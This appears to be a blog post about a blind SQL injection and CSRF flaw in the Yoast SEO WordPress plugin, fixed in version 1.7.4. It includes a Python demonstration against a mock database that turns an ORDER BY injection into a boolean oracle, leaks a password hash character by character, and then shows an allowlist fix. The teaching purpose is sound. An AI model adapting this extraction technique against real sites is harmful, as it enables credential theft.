A critical security vulnerability has been identified in one of the most popular and widely used SEO plugins for the WordPress content management system (CMS). Yoast SEO contains a flaw that lets an attacker read from or modify the site's database through a technique called blind SQL injection, and failure to patch it could have disastrous consequences.
Yoast SEO features a wide range of tools designed to help webmasters and bloggers optimize their sites, including an XML sitemap generator, RSS enhancements, on-page content analysis, custom titles and meta tags, breadcrumbs, canonical links, permalinks, social media integration, and more. Best of all, the plugin is free to use (paid/premium versions are also available).
To put the popularity of Yoast SEO into perspective, the official website claims that more than 14 million users have downloaded and installed the all-in-one search engine optimization plugin. That's far more than any other SEO plugin available for WordPress. However, popularity is no guarantee of security, as this vulnerability shows.
So, what exactly is a blind SQL injection and how do you fix it? In an ordinary SQL injection the attacker injects SQL into a query and reads the results straight off the page. In a blind SQL injection the application never shows query results or database errors, so the attacker instead asks the database a long series of true-or-false questions and infers each answer from some observable difference in the response (a different row order, a different page, or a delay), extracting data such as password hashes one character at a time. In Yoast SEO the injection point was the sorting parameters of the plugin's bulk editor, which were placed into a database query without strict sanitization; because the same requests also lacked proper CSRF protection, an attacker could embed the malicious request in a link or web page and have a logged-in administrator's browser send it. Technical jargon aside, database access of this kind can be used for a wide range of malicious purposes, such as setting up redirects, installing malware, placing pop-up ads on the site, or completely erasing the site's data.
Ryan Dewhurst from WPScan was reportedly the first person to spot the vulnerability in Yoast SEO, announcing the discovery on his blog. It wasn't long before the plugin was patched to fix the vulnerability.
The good news is that you can protect your site from this vulnerability by updating Yoast SEO to the latest version (version 1.7.4 or later). The update notes for this version state the following:
“Security fix: fixed possible CSRF and blind SQL injection vulnerabilities in bulk editor. Added strict sanitation to order_by and order params. Added extra nonce checks on requests sending additional parameters. Minimal capability needed to access the bulk editor is now Editor. Thanks Ryan Dewhurst from WPScan for discovering and responsibly disclosing this issue.”
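To make both the attack described above and the fix described in the changelog concrete, here is an added example (written for this article, not code from the Yoast SEO plugin). It models a bulk editor that builds its query by interpolating `order_by` and `order` parameters, shows how an attacker turns an `ORDER BY` injection into a boolean oracle that leaks a password hash one character at a time, and then shows the allowlist-style "strict sanitation" that closes the hole. The table and column names (`wp_users`, `wp_posts`, `user_pass`, `post_title`, `post_date`), the password hash and the rows are constructed sample data, and SQLite stands in for MySQL; the injection technique works the same way against either.

```python
import sqlite3

# Allowlists for the hardened version: only known columns and directions pass.
ALLOWED_ORDER_BY = {"post_title", "post_date", "post_author"}
ALLOWED_ORDER = {"ASC", "DESC"}


def make_db():
    """Constructed in-memory stand-in for a WordPress database (sample data, not real)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
        CREATE TABLE wp_posts (ID INTEGER PRIMARY KEY, post_title TEXT, post_date TEXT);
        INSERT INTO wp_users VALUES (1, 'admin', '$P$Bsecret');
        INSERT INTO wp_posts VALUES (1, 'Apple', '2015-03-02'),
                                    (2, 'Zebra', '2015-03-01');
    """)
    return conn


def bulk_editor_vulnerable(conn, order_by, order):
    """Vulnerable pattern: untrusted ordering parameters interpolated into the SQL text.
    ORDER BY cannot be parameterised with placeholders, which is why sites get this wrong."""
    sql = f"SELECT post_title FROM wp_posts ORDER BY {order_by} {order}"
    return [row[0] for row in conn.execute(sql)]


def bulk_editor_hardened(conn, order_by, order):
    """Fixed pattern: reject anything that is not an allowlisted column name or direction.
    This is the shape of the 'strict sanitation' the 1.7.4 changelog describes."""
    if order_by not in ALLOWED_ORDER_BY or order.upper() not in ALLOWED_ORDER:
        raise ValueError("invalid ordering parameter")
    sql = f"SELECT post_title FROM wp_posts ORDER BY {order_by} {order.upper()}"
    return [row[0] for row in conn.execute(sql)]


def hardened_rejects(conn, order_by, order):
    """True if the hardened editor refuses the given parameters."""
    try:
        bulk_editor_hardened(conn, order_by, order)
        return False
    except ValueError:
        return True


def oracle(conn, condition):
    """Boolean oracle built from the ORDER BY injection: a CASE expression sorts by
    post_title when `condition` is true and by post_date when it is false, so the
    attacker learns the answer from which row comes first."""
    payload = f"(CASE WHEN ({condition}) THEN post_title ELSE post_date END)"
    rows = bulk_editor_vulnerable(conn, payload, "ASC")
    # Title ascending puts 'Apple' first; date ascending puts 'Zebra' first.
    return rows[0] == "Apple"


def extract_password_hash(conn, user_id=1, max_len=64):
    """Blind extraction: one true/false question per candidate character per position."""
    charset = "$P./abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    recovered = ""
    for pos in range(1, max_len + 1):
        found = None
        for ch in charset:
            cond = (f"(SELECT substr(user_pass,{pos},1) FROM wp_users "
                    f"WHERE ID={user_id}) = '{ch}'")
            if oracle(conn, cond):
                found = ch
                break
        if found is None:          # substr() past the end returns '', so we are done
            break
        recovered += found
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("leaked via blind ORDER BY injection:", extract_password_hash(db))
    evil = "(CASE WHEN 1=1 THEN post_title ELSE post_date END)"
    print("hardened editor rejects payload:", hardened_rejects(db, evil, "ASC"))
    print("hardened editor, legitimate sort:", bulk_editor_hardened(db, "post_title", "desc"))
```

Note that no query output is ever shown to the attacker: the only signal is the order of the rows, which is exactly what makes the injection "blind". The hardened version does not try to escape the parameters, because `ORDER BY` takes an identifier rather than a value; the only safe approach is to compare the input against a fixed list of column names and directions and refuse everything else, which is what the changelog's "strict sanitation to order_by and order params" amounts to.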
The bottom line is that every webmaster and blogger using Yoast SEO should check that they are running version 1.7.4 or newer, and update immediately if not.
Do you currently use Yoast SEO plugin? Let us know in the comments section below!